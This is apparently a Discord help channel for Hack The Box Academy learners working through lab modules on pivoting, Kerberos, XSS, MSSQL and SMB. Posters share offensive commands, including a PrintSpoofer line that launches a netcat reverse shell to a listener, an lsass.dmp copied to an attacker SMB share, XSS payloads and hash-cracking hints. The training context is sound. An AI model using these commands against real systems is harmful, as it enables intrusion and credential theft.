#modules

smbclient -k

I've had it failing a lot. I completed the kerberos attack skill assessment, and got curious how I'd list the share from linux and tried stuff but no luck.

you can also use kerberos auth with cme

I'm missing something badly perhaps. I can't cme with -k either, it throws me the usual KDC_ERR_S_PRINCIPAL_UNKNOWN on DC and on other machine I get the connection reset by peer.
If anyone's completed the kerberos module, let me know.

Have you completed the Kerberos attacks module? @thorn urchin

no

that error usually means either that user doesnt exist, you didnt specify the proper FQDN, or your kerberos ticket is bad

I know the user exists and the FQDN isn't a thing with cme. Probably the later, I'll explore more.

or the service belongs to other forest

its always a thing, kerberos anal as fuck about domain names

No forest involved here.

?

forest doesnt matter

the error means the requested SPN is not in the Global Catalog

I was looking into one of Ipsecs video about this, he faced the exact same issue, but he fixed it just playing around with re-chaining the KRB5CCNAME variable. 🤔

ye cause his kerberos ticket was bad

Which can happen

sometimes you just need to regen the ticket

Hmm, I'll play around more. Thanks everyone~

For example, an event log 3 about a Kerberos error that has the error code 0x7 KDC_ERR_S_PRINCIPAL_UNKNOWN for Server Name cifs/<IP address> will be logged when a share access is made against a server IP address and no server name. If this error is logged, the Windows client automatically tries to fail back to NTLM authentication for the user account. If this operation works, receive no error.

https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-kerberos-event-logging

found this

Shells and Payloads module, Reverse Shell section: This script isnt working

You probably need to modify it to be your ip in the 10.10.14.158 part

yeah I know, but it writes many syntax errors

Can also use psexec

you dont have anything listening on 443

oh shit, yeah, I forgot to start the netcat listener , thanks 😄

what

So, on my win10 VM I can't install kali linux for WSL because it is saying "please enable the virtual machine platform windows feature and ensure virtualization in the BIOS"

How am I supposed to do this on a VM? When using key I only get boot manager for the VM not any bios settings

why are you trying to install a kali vm inside of a windows vm

It's part of this info sec foundational stuff

It's not the actual VM

it's kali linux for WSL

same thing, its still a vm effectively

All I am doing is following the guide hack the box lol

I don't know shit

😄

yeah idk, I havnt done that module

so no idea whyd they would want you to install a vm inside a vm

thats silly

<@&861185840277487616> bot

From what I can tell, it's basically so that you can use linux stuff in the windows environment, like they want me to be able to use Bash and chocolatey etc

yeah but you can just install a linux vm

Which I have done, in the previous section

During Linux fundamentals, I follow it and installed a Parrot OS VM

Now during windows fundamentals I installed a win 10 VM and it started asking me to do these things

and it asked you to install a windows VM?

"With all this in mind, where do we start? Fortunately for us, there are many new features with Windows that were not available just a few years ago. Windows Subsystem for Linux (WSL) is an excellent example of this. It allows for Linux operating systems to run alongside our Windows install. This can help us by giving us a space to run tools developed for Linux right inside our Windows host without the need for a hypervisor program or installation of a third-party application such as VirtualBox or Docker.

This section will examine and install the core components we will need to get our systems in fighting shape, such as WSL, Visual Studio Code, Python, Git, and the Chocolatey Package Manager. Since we are utilizing this platform to perform penetration test functions, it will also require us to make changes to our host's security settings. Keep in mind, most exploitation tools and code are just that, USED for EXPLOITATION and can be harmful to your host if not careful. Be mindful of what we install and run. If we do not isolate these tools off, Windows Defender will almost certainly delete any detected files and applications it deems harmful, breaking our setup. OK, let us dive in."

That sounds like instructions for a windows host, not necessarily to stack inside a windows vm

I thought this to after re-reading but then it litteraly goes from that to installing the windows VM

Personally id ignore it. Either follow the instructions inside a windows host, or skip.

Cause installing a vm inside a vm is dumb

imo at least

I don't get it myself really but I am new to all this, only been in IT since january and as an apprentice on help desk

So was just following the guide really

yeah happens. Like I said I didnt do that module so idk if youre misreading it or if it really is just suggesting you do something silly

https://academy.hackthebox.com/module/87/section/885

It is one or the other, either way thanks for your 10 cents

I am convinced you are right about this being something that should be done on a host

The crackmapexec in the target machine doesn't respect the KRB5CCNAME ccache file. That's the issue.

i followed every step

i coinfgured the proxy

server

and i got this

module

RDP and SOCKS Tunneling with SocksOverRDP

im losing my mind

fix?

the real time protection is deaxtivated

and im going crazy with this

that shit never works. Cheat and use it as a chance to practice a diff pivoting method

can i see your netsh command

TCP 127.0.0.1:1080 0.0.0.0:0 LISTENING

<@&861185840277487616> the bot, again.

can i try ligolo

in thi case

i've just started getting into ligolo and i'd recommend it

yeah go for it

wish it was covered in the pivoting module

ligolo is still relatively new

I could see it getting an addition though with how popular its getting

im losing my mind now

with that qusetiom

ill try ligolo

i hope it work

fuck my life with this same message haha

u guys prefer chisel or ligolo

lul

chisel was my favorite pivoting tool, Ive nearly entirely replaced it with ligolo

wish one u guys recommend for me to learn and practice and master

yeah hence why I think its a bot. Doesnt respond or react to anything, just copy pastes the same message periodically to dodge auto spam filters

@novel matrix ^

lmao

you jinxed it

diff guy but amusing timing

Who can help me with XSS module?
How do I use the payload i've got from xsstrike?

I ran xsstrike.py and found '><a%0doNpOINteREnter+=+a=prompt,a()>v3dm0s as the payload

sudo ip tuntap add user nee mode tun ligolo
sudo ip link set ligolo up how can we use this cmnd in windows

check the github page it tells you

can i dm you

about the sockoevr rdp

any one do Linux privilege escalation module section "Logrotate" was able to successfully get this exploit to run? Give me some help

you usually dont try a revshell with race condition exploits

try another approach

which part?

Phishing section

i've not used that script to complete the module

you can even complete it from your mom's PC

i mean you do not need any tool to complete the Phishing flag

How did u find out the payload to inject js in the url

inspecting the code

Sorry, it's not clear

its basic HTML tho

DM me if u want

what type of exploit should I do then?

think out of the box !

you have to "fuzz" it a little, try some input and check output

how can you escape and inject code?

Need a source module brute force admin root on an Android g stylus

Login Form Injection
"Once we identify a working XSS payload, we can proceed to the phishing attack"

I just wanted to understand how to use the xsstrike
How do I apply this payload that I found?

There's gotta be another way to apply the xsl module

Handshake certificate maybe ?

you do not need any tool to find the “payload”

You are not understanding my question. Thx anyway for helping me out

'> alert("XSS")

try that in the url field

Blessed

also the tool returned the correct payload which is '>

after that you include your code with script tags

since its javascript code

Yep I got that
I just trying to undersand the line of the xsstrike output:

"Payload: '><HTmL/+/oNPOIntereNTER%09=%09[8].find(confirm)//"

The thing is I was trying to read that and get the whole line rather than the '>

if you check the source code of the site (ctrl+u) you will see how your input is reflected and infere how to inject code which leads to '>

that is just a random payload used by the tool

to confirm the code injection and the consequent XSS

Ok understood.. ty
I'll inspect the code always thanks Rafa

from HTmL onwards is not needed

there you place your own code

Have you considered that meta data in security has already either patched or included method type ? Maybe same method different wording

?

Hello guys for anyone who’s doing the module pivoting & forwarding section SockOverrdp

and facing this probleme

i think your tunnel is not properly setup

when u cofigure the proxy

dont run mstcs.exe from the cmd

cuz u will face this problem

because reason 1 and 2 are not possible here

go to the search bar and rdp

and run it from there and the probleme will be fixed

that was weird but idk

everthing was set properly

i just tried to run rdp from the search bar

actually weird yea

and it worked

LOOOOOOOOOOOOOOOOOOl

can you check what binary does rdp from search bar run?

with right click > show in folder maybe

the sma e one

maybe from the cmd it runs with elevated privileges

i cant think about anything else

just user error xD

when i reach that module i will try in my side

idk

its so weird

like for real

wasted 6h

to fix this

XDDDDDD

so fking dumb

yo I am doing the same question, did you manage to do it. any hints

Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?

anywhere i can prcatice the ligol

on windows hosts

i want to change my nickname here

can an dfamin helpme to achieve this

best place is the prolabs but on the academy you can also do it on a few big module like the pivoting or the AD module both module have a lot of chained boxes and you can use those to practice pivoting

Read the section carefully

what is ur best pivoting tool

ligolo-ng

hmm been solving it for days now, almost gave up. any strong hints evnet IDs or filters \

yeah i want to start parcticing it

ig ill parcitce it

on pivoting skill assessement

tomorrow

Again if you read the section you'll generally get the answers

You've obviously missed something

You're given that the answer is a *.exe process

Yeah I already searched every log for that, I guess I have to try it again and again

Read the section, they probably give you a syntax to speed thing up

I don't have this module unlocked but that's my best guess

But you can also try Google if you've really been at it for days

Even this guy could not answer it I literally tried everything in my power

🥺

CLASSIC

I did, no clue but will just keep going, never give up never what?

The RPD session only gives a black screen, how to solve this? Rebooted the VM's already, restarted the services but nothing else thatn this.

Module: INTRODUCTION TO ACTIVE DIRECTORY --> AD Administration: Guided Lab Part I

Press space

So simple, thanks!

who can help me this modulehttps://academy.hackthebox.com/module/67/section/603.No matter how many times I follow the tutorial, it still fails and I don't know where I went wrong. I'm hoping someone can give me some tips, I'd be very grateful

Good morning.

I'm working the LINUX FUNDAMENTALS
Page 12
I'm stuck on the last questions.

I can't get the number of links correct

you can dm me

great

hey, i am working on the machine called nibbles in modules hack the box introduction, but the machine keep crashing and bugging "Timeout is exceeded The server at 10.129.213.xxx takes too long to respond. " , i have changed the vpn server, reset many time the box but it keep crashing. any clues ?

can you ping it from your machine?

Are you running both the in-browser pwnbox and a vpn connection from your own vm at the same time?

yes i am running my vpn on my vps pwn box and also my vpn in my pc browser locally

Don't

Running the pwnbox and vpn connection simultaneously causes network collision issues as they are both assigned the same internal ip

okay thanks, i will not do that anymore

You don't need to use the browser vm unless you're trying to troubleshoot why a command that looks correct isn't returning an expected result

now its working well better when i use just one machine and not 2 at the same time thanks

Some serious guiding going on here

?

Just wanted to say thanks. Didn't know that before

Oh lol

Like it makes sense when you realize the pwnbox is natively connected to the vpn network.

In the Linux privilege escalation Module.
Section logrotate.

I get a error.

I try a lot around and use different version of the exploit but still the same

is gcc installed on the target machine? You can directly compile it from there and avoid any dependecies issue

I compile on my own. I try it now

Hi guys, would someone please help me i am stuck with this question : Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get? i ve tried this command : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:32910 -H 'Host: FUZZ.academy.htb' -fs 900 -v
is it right ?

Is academy.htb in your /etc/hosts

Also were you given that port for http/https?

Hello

Ned help guys

Just ask your question

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I've donoe this, captured using:
curl -o website_source.html https://www.inlanefreight.com

and filtered using:
grep -o 'https://www\.inlanefreight\.com/[^"]*' website_source.html | sort -u

i get a bunch of inaccurate total number of links when i count with wc

I need help constructing the filter i think

You put your grep output flag before your actual grep

Also sometimes grep doesn't do regex

Iirc egrep does but you can just do man grep to see the regex flag

@fathom pendant yes its in /etc/hosts and its the port that they give
the scan returns a lot of subdomains and i dont know what to do

Well they're probably looking for a list... if you check usually it tells you the expected format

the expected format is '*. academy.htb' i ve tried with ' and doesnt work

@fathom pendant

...take the quotes out

i ve tried still not working i ve tried many option

and nothing worked

You said you get multiple outputs

Check the hint or reread the question

Also are you sure your -fs is correct

Your filter looks for a response size of 900, which could be the 404 page

Or some other error page

Or more accurately filters against size of 900

So anything that isn't a 900 size is returned

If you're looking for a response of size 900, then you want -ms

can't seem to do the filters properly

I think there's an example command in the cheat sheet

nothing there

read the section again then ¯_(ツ)_/¯

Also are you sure you're getting what you're expecting with your curl command

Add -e to your grep command

Thanks, that let's me specify multiple parameters for options

yes it was the filter i foud it finally thanks for ur help

That's another place where doubt lies. I wonder if there's something missinig there

Or I'm just not counting correctly

I think that i just mostly need to fix the regex for clearer filtering

Input the number that the wc command gives and see if it's the answer

¯_(ツ)_/¯

never is.

I want to fight

¯_(ツ)_/¯

I appreciate how hard these challenges are, however I want to advance

does anyone know how to complete the log poisoning lfi

Iirc single quotes and if you fuck it up, you gotta reset the box

lirc?

thankyou

... iirc stands for "if I recall correctly"

It's not a program or script

No

The amount of people that don't know common acronyms...

i only speed queens english

speak

ooof

yes done it

How do I link all my accounts with discord

feel like i nearly got to that answer before but the php leaving the log file output threw me off

what do you mean

U know

link my insta

and yt

and stuff like that

There's a settings in discord to do it, but that's not related to this channel

Read #welcome and #rules

No I just thought U guys could help

Oh Sorry!!

Also your question isn't related to the htb platform

please keep on topic.

need some help on the attacking common services sql section please!!!!

tell us

question 2 enum flagDB

i have a password for mssqlsvc but cant get anywhewre with it really for enumerating

well enumerate better

cant say more

lol

can't get anywhewre as in login?

im assuming you are logged in

i logged in with mssqlcient.py but cant elevetate priveleges

tried to impersonate too

with mssqclient.py for example

? 🤣

login with the service account and enumerate the database

dont forget to use -windows-auth flag

i did

cant even get in

that’s different

show us your error

hint if you was able to login then this isn't your goal

?

i just logged in thats so weird i tried 5x

you have to login as the service account MRtom

and then enumerate the database

its a simple exercise

no idea who that is

didnbt see any user in the db with that name

what dude

MRtom is a guy here in the chat

that is the service account 🤣 the given account is HTB-student or something not this

lol

thought you were talkign to me

the htbstudent is to trigger the ntlmv2 hash

please try to recall the module before talking

spoiler but yes he is on the second account which is only a step away from the flag (which is getting it 🤣 )

i got the hash

i always have my note open when helping

that is was i was telling him all the time

hi any hint for Footprinting medium machine im lost

same lul

see this message

ya

ive itried it with mssqlv and sqsh

he was 1 step from the flag 🤣

miss misread i guess

mssqlcient

netntlmv2 are not password hashes

i assume you cracked it?

so where are you stuck?

yup

connect with mssqlclient

at the start hahahah i just scann it but i dont have any cretendials for smb or rdp , rcp

i look at the forum that they mount a db but dont know how

first do some basic enum, try every the module showed base on what server there is on that box

Hello 👋

that isn't a good way to start 🤣 at least do some basic stuff before go looking answer somewhere else

everything you need is showed in the module

^

The nolock option is important

i took a lot of time off 😦

i think i will read some parts again

wlep you got the hint on where to start just go back to that section

yo @novel matrix you still here? got a clown here that need to be scoop up

You're in the wrong server for this crap

Need help regarding Broken Authentication Module -> Broken Cookies -> Question 1

let me guess need help with the role right?

yes

I was going to write that

What is the wisdom here , Mr. Squirrel

Hmm

hint read the question again the right role is in it 🤣

super user ?

some how 2 SERIOUS RULE BREAK and no one scoop that clown up

hint role has 1 word

and one of them is right so you may want to remove it 🤣

I am going to kill myself

lmao

Right infront of my eyes

same when i first doing this part

Thanks Mr.Chonky Squirrel

need some more help with sql section just need a hint or something

been stuck for 6 hours

which module?

and section

attacking common services sql

qurestion 2

oh still on that on? after logging in did you check ||flagDB|| ?

how i dont have permission

https://stackoverflow.com/questions/6598289/how-to-get-table-list-in-database-using-ms-sql-2008

with mssql service account you can read the flag

im reading it right now

it doent list show it on my end

just to test

flagDB isnt even there

ill send you screenshot

try master.dbo.sysdatabases also all of the command that you need for this last part is under SQL Syntax in that section

command from sql server documentation

or use the provided one in the module

btw you are querying for tables

i suggest you to take a look into sql module

here it is shown how information_schema works,

hello guys

need some help

i tried to use ligolo to pivot to an internal network and im facing this probleme

ebadmin@inlanefreight:~$ ./agent -connect 10.10.14.8:11601 -ignor-cert
./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./agent) ./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./agent)

itse funny because they tell us to go in order with the m odules

and that module is 10 modules after the one im on...

ah

CBBH > CPTS path (order)

guys is there a way to install responder from ubuntu linux?? (ping me :))

im still unable to get where i need to unfortunately

where?

someone?

i typed use flagDB and entered into the database but cant quaery anything its weird

same problem as usual, compile is statically

show tables;

isy go to github and search for impacket

i know!!!

it literally jsut hangs

responder is not from impacket

reset the machine

why?

XD how like compile it inside the target idk what do you mean

youre right my bad lol

git clone https://github.com/SpiderLabs/Responder

root@Linuxi:/home/isymbol# git clone https://github.com/SpiderLabs/Responder
fatal: destination path 'Responder' already exists and is not an empty directory.
alr did that 😭

locate respodner

locate responder and cd into it

where do git cloned repos go in?

you compile it locally and then transfer it to the victim machine

personally i have an uploads folder and spin up a WEBSERVER in the chosen programto transfer it

@sly dome all i can do i guess is reset the machinew

ive found some of these machines to be very buggy and need constant resets

ofc try that xD

ive never had to

but can happen

where do git clones repos go in?

doing it now ill

hello y'all, I'm receiving this error when try to pivot to the 2nd Windows Machine (172.16.6.155) into SockOverRDP lab exercise..!!! any idea what could be happening?

its not show tables my bad there xD

wait

SELECT Distinct TABLE_NAME FROM information_schema.TABLES

for example

from the module

SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES

i got it

it was select * from tb_flag

like this

┌──(shadowalker㉿kali)-[~/pivoting/ligolo-ng]
└─$ CGO_ENABLED=0 go build -o agentcompile -ldflags '-extldflags "-static"' ./cmd/agent/main.go

yes

the final step yes

finally

that sucked lol

thank you dude

I hope I'm not posting in the wrong are but please let me know.

Question on the Footprinting Pathway in the section of SMB.
I'm trying to answer this question:
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.

I tried looking over this several times and cant see where it instructs me to connect to the share. when I type command "smbclient //sambashare/sambauser -I 10.129.244.188" I get prompted for a password which I do not know. Can I please get some help???

smbclient <options> \\\\<ip-address>\\<sharename>

So thankful... I hate myself. I have taken notes on this in One note and skipped over the section where it says how to access a share Facepalm

anyone its possible to find ftp exploit on windows 11 machine

because i try 2 times

and nothing

no result's

sucks2suck

this isn't the place for it

ftp <ip>
and if it has anon login allowed then
ftp anonymous@<ip> (i think)

@sly dome

└─$ sudo ip route add 172.16.0.0/16 dev ligolo
[sudo] password for shadowalker:

┌──(shadowalker㉿kali)-[~]
└─$ ip route
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.8
10.129.0.0/16 via 10.10.14.1 dev tun0
172.16.0.0/16 dev ligolo scope link
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown i set up everything

still cannot ping the target

double check everything

you have to see in the ligolo-ng proxy the connection

also tell ligolo-ng to use that tunnel

how

like everything is set

which module are you on and are you sure the subnet is 172.16.0.0 ?

the proxy connected to the agent

inet 172.16.5.15 netmask 255.255.0.0

yea the subnet is 172.16.5.0/24 lol

tf

how can there be a 0.0/ network

if the netmask is 255.255.0.0 the CIDR is /16

wait what 255.255 is thge nework and the othger parts are the host no ?

start

also stop copy pasting your whole outputs

and start sending screenshots

of the whole process

we are unable to debug your own problem

i got a sa user and i cant use his credential for rdp, smb or rpc i dont know what im missing Footprinting Lab - Medium

a hint for the last part is instead of password spraying try ||username spraying || also for the logging in part you should be able to with the username start with ||a||

i got the username wiith a but i got from smb

i just look that i may use remmina?

any rdp tools will work fine

admin'# 🥵

i have some probles with xfreerdp

This module SA was a suffering lol.
couldnt have done it without this patient people @acoustic owl @carmine hill ❤️
Anyone in future need help with this module dm me ❤️

remmina worked :V

tier 3?

Yes

Would you also happen to know how to change directories while connected? When I try I get nowhere

I would suggest to look at the "linux fundamentals" module, anyway there is only one directory I can see

smb protocol is share based

and you don’t have access to the entire file system

If you're at the head of the share you're not gonna be able to go backwards

yea

@drifting vortex if you where asking for this here you have your answer

Thanks @fiery berry and @fathom pendant. I was trying to the head not realising I was already there I know the "D" stands for directory so I thought might as well start at the beggining... Im having a rought day :/

But my flag was in Contents so thank you guys!

That's why @fiery berry suggested linux Fundamentals

And tbh: the question probably told you it was there, if not it hinted it

90% of the time the question tells you where to look

The question was: Connect to the discovered share and find the flag.txt file. Submit the contents as the answer

So your right @fathom pendant. I know where I messed up but I'm too embaressed to talk about that. Ill take the L

Can I have a talk with sb?

https://tenor.com/view/cut-the-foreplay-and-just-ask-funny-superfunny-just-ask-just-do-it-gif-16160993

https://academy.hackthebox.com/module/84/section/802

Using Crackmapexec - Password Spraying - Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?

is it bugged this question?

I only find peter

I'm stuck on this question: **When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag. **

I'm stuck on finding the right username and passwordlist. I tried create various usernames list and passwordlists with cupp and username_anarchy, but so far I do not get a hit.

Is someone available to point me in the right direction?

found the right list

should put the module too

You're right, it is the login brute forcing module. But, I already solved this question. It was hard to easy that it maked it hard 🙂

I am stuck on this question in the "Introduction to Threat Hunting & Hunting With Elastic" module for a few days. Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.

I have tried to use event code 13 as suggested in the Hint but failing to understand what exactly I am looking for. I am even using the registry. path and registry.value fields but have above 9000 hits to filter.

hey guys I am struggling with a medium lab from the footprinting module

these are my findings so far

• Open ports: 111, 135, 139, 445 (RPC), 2049 (NFS), 3389 (RDP), 5985 (WinRM), 47001 (WinRS)

• Valid credentials obtained:

  • alex/lo.......... (from NFS share file)
  • sa/8......... (from SMB share file - potential SQL credentials)

• Users identified:

  • alex
  • HTB (target user)

• Services available:

  • RPC
  • SMB
  • NFS share /TechSupport
  • RDP
  • WinRM

• Information from RPC enumeration:

  • OS is Windows 10
  • Domain is WINMEDIUM
  • SMB share devshare

• Information from SMB share devshare:

  • File important.txt contained SQL credentials

• Information from NFS share:

  • Confirmed alex credentials
  • Indicates web server running at web.dev.inlanefreight.htb
  • References SMTP server smtp.web.dev.inlanefreight.htb

edited the pass and user

Does "Security Monitoring & SIEM Fundamentals" module, makes your work on Kibana?

it would help if you stated where you have problems

So where are you stuck? You have the credentials you need

You use kql yeah, within elastic

I am stuck on this question in the "Introduction to Threat Hunting & Hunting With Elastic" module for a few days. Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.
I have tried to use event code 13 as suggested in the Hint but failing to understand what exactly I am looking for. I am even using the registry. path and registry.value fields but have above 9000 hits to filter.

Event code 13 yes, but what else are you looking for?

What exactly in the registry path?

The link gives you the example keys which are default on windows

Make a query so that you have event code 13 and the paths it shows covered

cansomeone explaine this question

i used ligol-ng to connect to the internal network

how can i dwonload a file from the intenal network to mu machine

I mean pick your poison?

event.code:13 AND registry.path:"HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Use whatever file transfer you want.

if you preferred method requires hosting a service to do so, then add a listener to forward the port to your machine(assuming the end machine doesnt just have allowed outbound)

Try using wildcards before software and after run

Got it? @turbid heron

Trying...

*SOFTWARE…

Run*

hola alguna comundad en españo ??

This is an English server

a ok sorry XD

👍🏼

@turbid heron let me know if you finish

I am trying to send a picture just a second

addd a listener on the proxy or the client

like im abit confused

You need to verify your acc to send pics

ligolo has a listener_add function

#welcome

That depends per person I guess

Ive heard people struggling with malware analysis though

yes i know

Haven’t gotten that far myself, but I’d say the first 4 modules are definitely doable

but i want to make an smb c,lient on my attack box

If you still haven't found it, check if you have all smb users with --users

and move the file from the internal ntework

you can just use smbclient then

nothing extra needed

youd only add a listener if the end box doesnt have outbound to your machine AND you need to host a service(i.e a web server. a smb share, ect) or if you need to double pivot

yeah but when im using like move from the windows host

then thats not smbclient

smbclient is a specific tool

And recommend it to those that are more interested in blue side, or want to learn more about it

if you just want to host a smb share

then yes, add a listener

this is without the registry.path parameter

trying different ways for registry.path

smbserver.py on my attack box

right

event.code:13  AND registry.path:*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*

if thats how you want to do it then yeah, in which case youd add a listener if the end box doesnt have outbound to you

i need to aad a listen on the proxy or the client

can i dm you to explain more

no Im at work

oh oki

you dont need to worry about proxy or client. just use the ligolo provided functionality

it spawns the listener for you

honestly its something a lot clearer if you just follow the instructions on the github and try it out and see what happens

oki

i want to do this

Thank you 0x56 the query you suggested was the perfect one it narrowed it down to 12 hits....I realized my use of ( " " ) outside the path was wrong

Thanks again

You’re welcome👍🏼

Sometimes 172.16.5.35 can reach 10.10.14.8 anyways and a listener isnt necessary. If it can't though, then yes a listener is precisely for this situation

how can that happens? its a different network

im asking

Why can your computer behind your nat reach out to google, its a different network 🤔

router

(basically outbound tends to be less restricted than inbound)

but for 172 to reach 10 you need web server acting as a router

or am i wrong?

you wouldnt need a web server specifically, but yeah. which is a very safe assumption in the real world

remember the 10.0 network is just a lab convenience

im referring to the screenshot above

specifically

in the real world that 10.0 machine is likely to be a public machine running your c2

ah i think i understand you

yes. and often theyre just meant to be analogies for a real world situation

you mean than in real scenarios both networks maybe are connected

that we should first try without listeners

and even in a lab because a lab is simulating a real world scenario

that is a nice tip

thanks

id just set up a listener w/o trying

You dont necessarily have to try it first, I often just make the listener as well, but it can be convenient sometimes when it doesnt work well

theres also side considerations about how in a real network it may look weird if you just keep routing everything through the same workstation on the network

true

smbserver.py -smb2support -port 9001 MyShare /path/to/directory on my attack box
on the internal ntework move lsass.dmp \172.16.5.15:9001\skill
and on the pivot i did this listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:9001 --tcp
but it didnt work

what im doing worng

in the move command you need to”\\”

to tell its a network share

but otherwise i see@all good

some more modern windows also denies anonymous share access you have to specify a user and password for smbserver

also you have to specify MyShare

also with ligolo I dont like specifying 127.0.0.1 as it can be kinda wonky sometimes. If im lazy ill just use 0.0.0.0 for both

I keep getting the page is timing out.

PS C:\Windows\system32> move C:\lsass.dmp \172.16.5.15:9001\skill
move : The network path was not found
At line:1 char:1

• move C:\lsass.dmp \172.16.5.15:9001\skill

•   + CategoryInfo          : WriteError: (C:\lsass.dmp:String) [Move-Item], IOException
    + FullyQualifiedErrorId : MoveItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

?

the actual path is MyShare

iirc

See the like three other little things I advised

big one being the share name

actually the error is about the path

im hosting the smb server on my kali on 10.10.14.8:9001

the shre name is skill

can you mount the net share?

like map it

like use x: NET_SHARE_HERE

if you cannot you need credentials

like madf0x said

also while it shouldnt be an issue, if Im gunan host a smbserver I prefer to keep it on 445 because that makes windows more happy

i think they have had so many vulns and flaws around SMB they just do not let you disable the firewall 🤣

only port 445 allowed guys

double bonus is that its slightly more stealthy too because why tf is smb operating on ANY port other than 139/445?

hey boss why is Tom’s PC sending smb traffic through port 9001?

🤣

wtf now i cannot add

a listener

om the agent

my god

my heads hurt at thi points

yo guys

ill ask a qusetion it may feel stupid

but im not thinking proprly at this point

XD

can i add a listener on the agent not the proxy

you do not interact with the agent on the agent

or i i need to add the listener on the proxy and it will creat a listent automaticly

proxy is honestly a bad name for it

I rename mine server

the server

im feeling dumb actuallt

at this point

.

think of the proxy/server as your command interface/C2 for your pivots

i need to go sleep XDD im losing my brain cells

the msfconsole to your meterpreter

Why is nc -nv taking long to respond in ids/ips hard lab

why the error i was trying to practice the given commands

Anybody up?

I am!

on researching i found about root squashing

i got stuck in Footprinting skills assessment lab 2

i got the nfs share but no luck as there is the permission of nobody user

I even mounted the share as root

but couldn't open the share

Can you provide me any hint or ways that the "nologin" can be bypassed or something related to it?

I have not made it to the assessment lab 2 yet. Apologies.

No worries

sudo su

then you unfortunately went about it wrong

you gotta mount and browse as root

you mean i don't need to mount it as root?

no I said and

Ohh yeah yeahhh, themkssss, i got it

As was told to you multiple times

Having the same issue.

Fixed by using this command sudo bundle install instead of bundle install

anyone know about this error?
smbclient > get 7-ZipPortable_21.07.paf.exe
parallel_read returned NT_STATUS_IO_TIMEOUT

willbe grateful if helping

Use timeout in smbclient

thank you

Np

I have a general question about HTB

read #welcome and #rules after that use /verify at #bot-commands and ask that at #general ot #1024429874246590575

what is the purpose of "/format:hashcat" in Rubeus? I am asking this because I cracked the hash using hashcat with and without using that tag and got the clear text pass.

is there are red teams 👀

: i need some help with the nmap module if thats alright

Is there a channel for the new cdsa path ?

https://www.hackthebox.com/achievement/machine/1670343/394

I own this now lmao

hello any help : module ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation : using c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.15.128 8443 -e cmd" tried multiple PrintSpoofer versions still got error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 216.

read #welcome and verify, this is only for HTB Academy modules

who can help me the WINDOWS PRIVILEGE ESCALATION-Credential Hunting,in this first question I find so many password but not on is right

While the "first question" can be solved entierly by using the GUI, you can try one of the command shown in the section module

yeah I use "findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml"

if the output is overwhelming try one extension a time

but it have so many file and I find some see like right password but are all error

what?

read the above

can you give me the command?

it is literally the same command you used, just search for one extension a time

ok let me try

also not have

did you put some effort looking at the output of the command? The file you're looking for is in a path which will stand out from the others and it has a ||.xml|| extension

you can see I give your picture,it have so many file

ok I find

thanks

I had the same result as everyone does (more or less probably) I was patient and I start to skim only through interesting paths

yeah,for begin I can't see it

oh sry ok

I didnt saw the channel name and all

my bad

Module name : Password attacks
Section name : Passwd, Shadow & Opasswd
can someone help me with hashcat, ||i found the backup folder and exported passwd.bak and shadow.bak and then i mutated the wordlist but hashcat can't find the password for the root user i did hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked|| i dont know what to do

try rockyou instead

yo where can I find account identifier?

can u help me w that?

you need an account on the main platform, unless you have silver annual

I do have a account but I dont know what you are talking about

Is there a way to check what modules are included in the new SOC path?

please read #welcome

https://academy.hackthebox.com/path/preview/soc-analyst

ahh should have opened my eyes XD

I done Comptia cysa+ now I wanted to do The free modules and start the pentest path after, would you recommend doing SOC first and Pentest after or would that be a money sink ?

i have to use hashcat but he stops everytime

I checked my notes, the mutated password list should work, try running hashcat on your host instead and maybe try with John

i'll try thanks

Hello friend. Could you give me some hints?

Hello gentlemen and ladies! could someone provide me some hints for Brute Forcing Usernames /question2 ?
Tried burp, ffuf, hydra and plenty userlists with no luck. Also applied various regex.
Thanks in advance!

Friends, how can I bypass the 403 forbiden page because I know that the server has understood my request, but unfortunately I do not have permission to access that page.

I need help for this question "Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system."

Hi guys. For the Footprinting Module -DNS I'm on the question: _What is the FQDN of the host where the last octet ends with "x.x.x.203"? _

